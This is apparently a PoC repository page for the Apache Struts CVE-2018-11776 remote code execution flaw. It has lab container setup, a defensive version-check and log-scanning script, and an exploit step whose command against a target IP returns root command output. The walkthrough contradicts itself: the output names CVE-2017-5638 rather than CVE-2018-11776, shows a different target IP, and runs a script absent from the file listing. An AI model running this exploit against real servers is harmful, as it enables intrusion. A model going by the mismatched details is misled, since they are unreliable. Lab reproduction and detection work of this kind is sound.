POC details: 8c56f2061514c4e8d7067623a26a0106df069d89

Source
Related vulnerability
Title: Apache Struts input validation error vulnerability (CVE-2018-11776)
Description: Apache Struts is an open-source project maintained by the Apache Software Foundation in the United States. It is an open-source MVC framework for building enterprise-grade Java web applications and is offered mainly as two framework products, Struts 1 and Struts 2. Apache Struts 2 is the next-generation Apache Struts product, an entirely new framework built by merging the technology of Struts 1 and WebWork; its architecture differs considerably from that of Struts 1. Apache Struts versions 2.3 through 2.3.34 and 2.5 through 2.5.16 contain an input validation vulnerability.
Introduction
<h3>Apache Struts CVE-2018-11776 Python PoC</h3>

<p>
This is based on https://github.com/hook-s3c/CVE-2018-11776-Python-PoC. The container build and instructions there did not work as described in that README, so this fork was created. The PoC exploit used is from Rapid7.
</p>
<p>
Shoutout:
</p>

<p>
hook-s3c (github.com/hook-s3c), @hook_s3c on twitter <br>
Rapid7 https://github.com/rapid7/metasploit-framework/issues/8064
</p>

<h3>Introduction</h3>

<p>
Man Yue Mo from Semmle has disclosed a Struts2 RCE vulnerability, delivered in a payload encoded in the URL path of a request.
</p>

<p>
Versions affected are 2.3 to 2.3.34, and 2.5 to 2.5.16.
</p>

<p>
The default configuration is not vulnerable. This container, and many others, are.
</p>
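<p>
The two facts above (an affected version range, and a payload carried in the URL path) are what a defender can act on. The script below is an added example, not code from this repository or from the Rapid7 exploit: it classifies a Struts version string against the affected ranges listed here (taken as inclusive), and scans access-log lines for the start of an OGNL expression (<code>${</code> or <code>%{</code>, plain or URL-encoded) in the request path, reporting separately when the marker is only in the query string. The log lines are constructed for the example, the log format assumed is common-log style, and the <code>/struts2-showcase/</code> prefix mirrors the WAR shipped in this repository.
</p>

```python
# Added example (not part of the PoC repository or the Rapid7 exploit).
# Two defensive helpers for CVE-2018-11776:
#   1. is_affected(): does a Struts version string fall in the ranges the
#      README lists as affected (2.3 to 2.3.34, 2.5 to 2.5.16, inclusive)?
#   2. suspicious_requests(): scan access-log lines for OGNL expression
#      markers ("${" or "%{", possibly URL-encoded) in the request path, the
#      delivery channel for this vulnerability's payload. The log lines are
#      constructed for this example; common-log format is assumed.
import re
from urllib.parse import unquote

AFFECTED_RANGES = (((2, 3, 0), (2, 3, 34)), ((2, 5, 0), (2, 5, 16)))


def parse_version(version):
    """'2.3.12' -> (2, 3, 12); missing components are treated as 0."""
    parts = [int(p) for p in re.findall(r"\d+", version)][:3]
    return tuple(parts + [0] * (3 - len(parts)))


def is_affected(version):
    """True if the version lies inside one of the affected ranges."""
    v = parse_version(version)
    return any(lo <= v <= hi for lo, hi in AFFECTED_RANGES)


# Start of an OGNL expression, once the URL has been decoded.
OGNL_MARKER = re.compile(r"[$%]\{")

# Common-log format: ip ident user [time] "METHOD url PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)


def decode_url(url, rounds=2):
    """URL-decode up to `rounds` times so double-encoded markers are caught."""
    for _ in range(rounds):
        decoded = unquote(url)
        if decoded == url:
            break
        url = decoded
    return url


def suspicious_requests(lines):
    """Return (ip, raw_url, location) for requests carrying an OGNL marker.

    location is 'path' (the vector described for CVE-2018-11776) or 'query'
    (marker present only in the query string, worth a look but a different
    vector)."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable request line; skip it
        raw = m.group("url")
        path, _, query = decode_url(raw).partition("?")
        if OGNL_MARKER.search(path):
            hits.append((m.group("ip"), raw, "path"))
        elif OGNL_MARKER.search(query):
            hits.append((m.group("ip"), raw, "query"))
    return hits


# Constructed sample log lines (not real traffic). Line 2 carries a
# URL-encoded "${1+1}" probe in the path, line 3 the same probe unencoded,
# line 4 a marker in the query string only.
SAMPLE_LOG = [
    '10.0.0.5 - - [23/Aug/2018:10:00:01 +0000] "GET /struts2-showcase/index.action HTTP/1.1" 200 5120',
    '10.0.0.9 - - [23/Aug/2018:10:00:07 +0000] "GET /struts2-showcase/%24%7B1%2B1%7D/index.action HTTP/1.1" 302 0',
    '10.0.0.9 - - [23/Aug/2018:10:00:09 +0000] "GET /struts2-showcase/${1+1}/actionChain1.action HTTP/1.1" 302 0',
    '10.0.0.5 - - [23/Aug/2018:10:00:15 +0000] "GET /struts2-showcase/help.action?q=%24%7B HTTP/1.1" 200 1900',
]

if __name__ == "__main__":
    for v in ("2.3.12", "2.3.35", "2.5.16", "2.5.17"):
        state = "AFFECTED" if is_affected(v) else "not in affected range"
        print(f"Struts {v}: {state}")
    for ip, url, where in suspicious_requests(SAMPLE_LOG):
        print(f"OGNL marker in {where} from {ip}: {url}")
```

<p>
Run it as-is to see the constructed lines classified; to use it on real logs, feed the lines of an access log to <code>suspicious_requests()</code>. Decoding twice matters because a marker that arrives double-encoded would otherwise pass a single-pass filter.
</p>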

<h3>Step 1 - Build the Container</h3>

<p>
It's preferable to build a container from a Dockerfile, so you can see what is going into the build.
</p>
<br>

<code>
   git clone https://github.com/freshdemo/ApacheStruts-CVE-2018-11776 ./Struts
</code>
<br>
<code>
   cd Struts
</code>
<br>
<code>
   docker build . -t freshdemo/apachestruts
</code>
<br><br>

<p>
Find the new container with
</p>
<br>

<code>
   docker images
</code>
<br><br>

<p>
The output should be similar to this, where you can get the image ID.
</p>
<br>

<pre>
root@DockerHost:~/ApacheStruts-CVE-2018-11776# docker images
REPOSITORY                                 TAG                 IMAGE ID            CREATED              SIZE
freshdemo/apachestruts                     latest              6586cedf49fa        About a minute ago   542MB
</pre>
<br>


<h3>Step 2 - Run the Container</h3>

<p>
Start a container from the image you just built, referencing it by the tag given to <code>docker build</code> (or by the image ID shown by <code>docker images</code>).
</p>
<br>

<code>
   docker run -d --name apachestruts -p 8080:8080 freshdemo/apachestruts
</code>
<br>

<h3>Step 3 - Exploit</h3>

<p>
Make sure any ingress/egress firewalls permit the port you specified earlier (8080), then run the exploit against your target with the following.
</p>
<br>

<code>
   python struts.py http://192.168.2.188:8080 'id'
</code>
<br><br>

<p>
Your output should be similar to this.
</p>
<br>

<pre>
root@k:/home/s# python struts.py http://192.168.2.188:8080 'id'
[*] CVE: 2017-5638 - Apache Struts2 S2-045
http://13.88.250.188:8080 : [*] cmd: id


uid=0(root) gid=0(root) groups=0(root)
</pre>
<br>
File snapshot

[4.0K] /data/pocs/8c56f2061514c4e8d7067623a26a0106df069d89
├── [ 190] Dockerfile
├── [2.0K] exploit.py
├── [2.3K] README.md
└── [ 12M] struts2-showcase-2.3.12.war
0 directories, 4 files